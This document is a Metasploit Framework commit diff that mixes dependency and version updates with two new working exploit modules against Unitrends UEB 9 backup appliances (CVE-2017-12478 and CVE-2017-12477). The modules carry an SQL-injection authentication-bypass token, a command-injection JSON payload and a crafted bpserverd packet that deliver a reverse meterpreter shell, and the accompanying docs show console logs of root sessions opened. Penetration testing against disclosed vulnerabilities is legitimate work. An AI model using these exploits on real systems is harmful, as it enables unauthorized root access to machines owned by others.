Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec

bug/bundler_fix
mumbai 2017-10-20 20:13:29 -04:00
commit 2e376a1b6a
12 changed files with 390 additions and 28 deletions

View File

@ -19,8 +19,10 @@ group :development do
# module documentation # module documentation
gem 'octokit' gem 'octokit'
# Metasploit::Aggregator external session proxy # Metasploit::Aggregator external session proxy
# Disabled for now for crypttlv updates gem 'metasploit-aggregator' if [
# gem 'metasploit-aggregator' 'x86-mingw32', 'x64-mingw32',
'x86_64-linux', 'x86-linux',
'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
end end
group :development, :test do group :development, :test do

View File

@ -1,7 +1,7 @@
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.16.12) metasploit-framework (4.16.13)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -104,13 +104,14 @@ GEM
arel (6.0.4) arel (6.0.4)
arel-helpers (2.5.0) arel-helpers (2.5.0)
activerecord (>= 3.1.0, < 6) activerecord (>= 3.1.0, < 6)
backports (3.10.0) backports (3.10.3)
bcrypt (3.1.11) bcrypt (3.1.11)
bcrypt_pbkdf (1.0.0) bcrypt_pbkdf (1.0.0)
bindata (2.4.1) bindata (2.4.1)
bit-struct (0.16) bit-struct (0.16)
builder (3.2.3) builder (3.2.3)
coderay (1.1.2) coderay (1.1.2)
concurrent-ruby (1.0.5)
crass (1.0.2) crass (1.0.2)
diff-lcs (1.3) diff-lcs (1.3)
dnsruby (1.60.2) dnsruby (1.60.2)
@ -126,15 +127,40 @@ GEM
ffi (1.9.18) ffi (1.9.18)
filesize (0.1.1) filesize (0.1.1)
fivemat (1.3.5) fivemat (1.3.5)
google-protobuf (3.4.1.1)
googleapis-common-protos-types (1.0.0)
google-protobuf (~> 3.0)
googleauth (0.5.3)
faraday (~> 0.12)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.6.7)
google-protobuf (~> 3.1)
googleapis-common-protos-types (~> 1.0.0)
googleauth (~> 0.5.1)
hashery (2.1.2) hashery (2.1.2)
i18n (0.8.6) i18n (0.9.0)
concurrent-ruby (~> 1.0)
jsobfu (0.4.2) jsobfu (0.4.2)
rkelly-remix rkelly-remix
json (2.1.0) json (2.1.0)
jwt (1.5.6)
little-plugger (1.1.4)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.1.1) loofah (2.1.1)
crass (~> 1.0.2) crass (~> 1.0.2)
nokogiri (>= 1.5.9) nokogiri (>= 1.5.9)
memoist (0.16.0)
metasm (1.0.3) metasm (1.0.3)
metasploit-aggregator (1.0.0)
grpc
rex-arch
metasploit-concern (2.0.5) metasploit-concern (2.0.5)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
@ -168,6 +194,7 @@ GEM
mini_portile2 (2.3.0) mini_portile2 (2.3.0)
minitest (5.10.3) minitest (5.10.3)
msgpack (1.1.0) msgpack (1.1.0)
multi_json (1.12.2)
multipart-post (2.0.0) multipart-post (2.0.0)
nessus_rest (0.1.6) nessus_rest (0.1.6)
net-ssh (4.2.0) net-ssh (4.2.0)
@ -179,6 +206,7 @@ GEM
sawyer (~> 0.8.0, >= 0.5.3) sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1) openssl-ccm (1.2.1)
openvas-omp (0.0.4) openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13) packetfu (1.1.13)
pcaprub pcaprub
patch_finder (1.0.2) patch_finder (1.0.2)
@ -195,7 +223,7 @@ GEM
activerecord (>= 4.0.0) activerecord (>= 4.0.0)
arel (>= 4.0.1) arel (>= 4.0.1)
pg_array_parser (~> 0.0.9) pg_array_parser (~> 0.0.9)
pry (0.11.1) pry (0.11.2)
coderay (~> 1.1.0) coderay (~> 1.1.0)
method_source (~> 0.9.0) method_source (~> 0.9.0)
public_suffix (3.0.0) public_suffix (3.0.0)
@ -271,29 +299,29 @@ GEM
rex-zip (0.1.3) rex-zip (0.1.3)
rex-text rex-text
rkelly-remix (0.0.7) rkelly-remix (0.0.7)
rspec (3.6.0) rspec (3.7.0)
rspec-core (~> 3.6.0) rspec-core (~> 3.7.0)
rspec-expectations (~> 3.6.0) rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.6.0) rspec-mocks (~> 3.7.0)
rspec-core (3.6.0) rspec-core (3.7.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-expectations (3.6.0) rspec-expectations (3.7.0)
diff-lcs (>= 1.2.0, < 2.0) diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-mocks (3.6.0) rspec-mocks (3.7.0)
diff-lcs (>= 1.2.0, < 2.0) diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-rails (3.6.1) rspec-rails (3.7.1)
actionpack (>= 3.0) actionpack (>= 3.0)
activesupport (>= 3.0) activesupport (>= 3.0)
railties (>= 3.0) railties (>= 3.0)
rspec-core (~> 3.6.0) rspec-core (~> 3.7.0)
rspec-expectations (~> 3.6.0) rspec-expectations (~> 3.7.0)
rspec-mocks (~> 3.6.0) rspec-mocks (~> 3.7.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.7.0)
rspec-rerun (1.1.0) rspec-rerun (1.1.0)
rspec (~> 3.0) rspec (~> 3.0)
rspec-support (3.6.0) rspec-support (3.7.0)
ruby-rc4 (0.1.5) ruby-rc4 (0.1.5)
ruby_smb (0.0.18) ruby_smb (0.0.18)
bindata bindata
@ -304,6 +332,11 @@ GEM
sawyer (0.8.1) sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6) addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0) faraday (~> 0.8, < 1.0)
signet (0.8.1)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (>= 1.5, < 3.0)
multi_json (~> 1.10)
simplecov (0.15.1) simplecov (0.15.1)
docile (~> 1.1.0) docile (~> 1.1.0)
json (>= 1.8, < 3) json (>= 1.8, < 3)
@ -332,6 +365,7 @@ PLATFORMS
DEPENDENCIES DEPENDENCIES
factory_girl_rails factory_girl_rails
fivemat fivemat
metasploit-aggregator
metasploit-framework! metasploit-framework!
octokit octokit
pry pry

View File

@ -0,0 +1,42 @@
## Vulnerable Application
Unitrends UEB 9 http api/storage remote root
This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent root RCE.
## Verification Steps
1. ```use exploit/linux/http/ueb9_api_storage ```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```exploit```
5. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.1 on CentOS 6.5
```
msf > use exploit/linux/http/ueb9_api_storage
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_api_storage) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:443 - pwn'ng ueb 9....
[*] Command Stager progress - 19.83% done (164/827 bytes)
[*] Command Stager progress - 39.30% done (325/827 bytes)
[*] Command Stager progress - 57.44% done (475/827 bytes)
[*] Command Stager progress - 75.45% done (624/827 bytes)
[*] Command Stager progress - 93.35% done (772/827 bytes)
[*] Command Stager progress - 110.88% done (917/827 bytes)
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Command Stager progress - 126.72% done (1048/827 bytes)
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

View File

@ -0,0 +1,72 @@
## Vulnerable Application
Unitrends UEB 9 bpserverd authentication bypass RCE
This exploit uses roughly the same process to gain root execution
as does the apache user on the Unitrends appliance. The process is
something like this:
1. Connect to xinetd process (it's usually running on port 1743)
2. This process will send something like: `?A,Connect36092`
3. Initiate a second connection to the port specified
in the packet from xinetd (36092 in this example)
4. send a specially crafted packet to xinetd, containing the
command to be executed as root
5. Receive command output from the connection to port 36092
6. Close both connections
## Verification Steps
1. ```use exploit/linux/misc/ueb9_bpserverd ```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```exploit```
5. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.1 on CentOS 6.5
```
msf > use exploit/linux/misc/ueb9_bpserverd
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_bpserverd) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 45425
[*] 10.0.0.230:1743 - Connecting to 45425
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40889
[*] 10.0.0.230:1743 - Connecting to 40889
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40016
[*] 10.0.0.230:1743 - Connecting to 40016
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 53649
[*] 10.0.0.230:1743 - Connecting to 53649
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```

View File

@ -30,7 +30,7 @@ module Metasploit
end end
end end
VERSION = "4.16.12" VERSION = "4.16.13"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev' PRERELEASE = 'dev'
HASH = get_hash HASH = get_hash

View File

@ -334,7 +334,7 @@ module Exploit::Remote::HttpClient
# Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}. # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
# #
# @return (see Rex::Proto::Http::Client#send_recv)) # @return (see Rex::Proto::Http::Client#send_recv))
def send_request_cgi(opts={}, timeout = 20) def send_request_cgi(opts={}, timeout = 20, disconnect = true)
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
actual_timeout = datastore['HttpClientTimeout'] actual_timeout = datastore['HttpClientTimeout']
else else
@ -362,7 +362,7 @@ module Exploit::Remote::HttpClient
print_line('#' * 20) print_line('#' * 20)
print_line(res.to_terminal_output) print_line(res.to_terminal_output)
end end
disconnect(c) disconnect(c) if disconnect
res res
rescue ::Errno::EPIPE, ::Timeout::Error => e rescue ::Errno::EPIPE, ::Timeout::Error => e
print_line(e.message) if datastore['HttpTrace'] print_line(e.message) if datastore['HttpTrace']

View File

@ -593,7 +593,7 @@ class Driver < Msf::Ui::Driver
when "prompt" when "prompt"
update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true) update_prompt(val, framework.datastore['PromptChar'] || DefaultPromptChar, true)
when "promptchar" when "promptchar"
update_prompt(framework.datastore['Prompt'], val, true) update_prompt(framework.datastore['Prompt'] || DefaultPrompt, val, true)
end end
end end

View File

@ -0,0 +1,93 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Unitrends UEB 9 http api/storage remote root',
'Description' => %q{
It was discovered that the api/storage web interface in Unitrends Backup (UB)
before 10.0.0 has an issue in which one of its input parameters was not validated.
A remote attacker could use this flaw to bypass authentication and execute arbitrary
commands with root privilege on the target system.
},
'Author' =>
[
'Cale Smith', # @0xC413
'Benny Husted', # @BennyHusted
'Jared Arave' # @iotennui
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => [ 'printf' ],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
['CVE', '2017-12478'],
],
'Targets' =>
[
[ 'UEB 9.*', { } ]
],
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'SSL' => true
},
'DisclosureDate' => 'Aug 8 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true])
])
deregister_options('SRVHOST', 'SRVPORT')
end
#substitue some charactes
def filter_bad_chars(cmd)
cmd.gsub!("\\", "\\\\\\")
cmd.gsub!("'", '\\"')
end
def execute_command(cmd, opts = {})
session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass
session = Base64.strict_encode64(session) #b64 encode session token
#substitue the cmd into the hostname parameter
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
parms << filter_bad_chars(cmd)
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
res = send_request_cgi({
'uri' => '/api/storage',
'method' => 'POST',
'ctype' => 'application/json',
'encode_params' => false,
'data' => parms,
'headers' =>
{'AuthToken' => session}
})
if res && res.code != 500
fail_with(Failure::UnexpectedReply,'Unexpected response')
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
def exploit
print_status("#{peer} - pwn'ng ueb 9....")
execute_cmdstager(:linemax => 120)
end
end

View File

@ -0,0 +1,119 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Unitrends UEB bpserverd authentication bypass RCE',
'Description' => %q{
It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
has an issue in which its authentication can be bypassed. A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
},
'Author' =>
[
'Jared Arave', # @iotennui
'Cale Smith', # @0xC413
'Benny Husted' # @BennyHusted
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => [ 'printf' ],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],
['CVE', '2017-12477'],
],
'Targets' =>
[
[ 'UEB 9.*', { } ]
],
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'SSL' => false
},
'DisclosureDate' => 'Aug 8 2017',
'DefaultTarget' => 0))
register_options([
Opt::RPORT(1743)
])
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
s1 = connect(global = false)
buf1 = s1.get_once(-1).to_s
#parse out the bpd port returned
bpd_port = buf1[-8..-3].to_i
#check if it's a valid port number (1-65534)
if bpd_port && bpd_port >= 1 && bpd_port <= 65535
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
end
def execute_command(cmd, opts = {})
#append a comment, ignore everything after our cmd
cmd = cmd + " #"
# build the attack buffer...
command_len = cmd.length + 3
packet_len = cmd.length + 23
data = "\xa5\x52\x00\x2d"
data << "\x00\x00\x00"
data << packet_len
data << "\x00\x00\x00"
data << "\x01"
data << "\x00\x00\x00"
data << "\x4c"
data << "\x00\x00\x00"
data << command_len
data << cmd
data << "\x00\x00\x00"
begin
print_status("Connecting to xinetd for bpd port...")
s1 = connect(global = false)
buf1 = s1.get_once(-1).to_s
#parse out the bpd port returned, we will connect back on this port to send our cmd
bpd_port = buf1[-8..-3].to_i
print_good("bpd port recieved: #{bpd_port}")
vprint_status("Connecting to #{bpd_port}")
s2 = connect(global = false, opts = {'RPORT'=>bpd_port})
vprint_good('Connected!')
print_status('Sending command buffer to xinetd')
s1.put(data)
s2.get_once(-1,1).to_s
disconnect(s1)
disconnect(s2)
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
fail_with(Failure::Unreachable, "#{peer} - Connection to server failed")
end
end
def exploit
print_status("#{peer} - pwn'ng ueb 9....")
execute_cmdstager(:linemax => 200)
end
end

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
update_info( update_info(
info, info,
'Name' => 'Polycom Command Shell Authorization Bypass', 'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'psh_auth_bypass', 'Alias' => 'polycom_hdx_auth_bypass',
'Author' => 'Author' =>
[ [
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module

View File

@ -494,7 +494,7 @@ class MetasploitModule < Msf::Exploit::Remote
].pack('v') ].pack('v')
else else
fail_with(Failure::NoTarget, "Unknown target #{targetr['Method']}") fail_with(Failure::NoTarget, "Unknown target #{target['Method']}")
end end
# Build the ANI file # Build the ANI file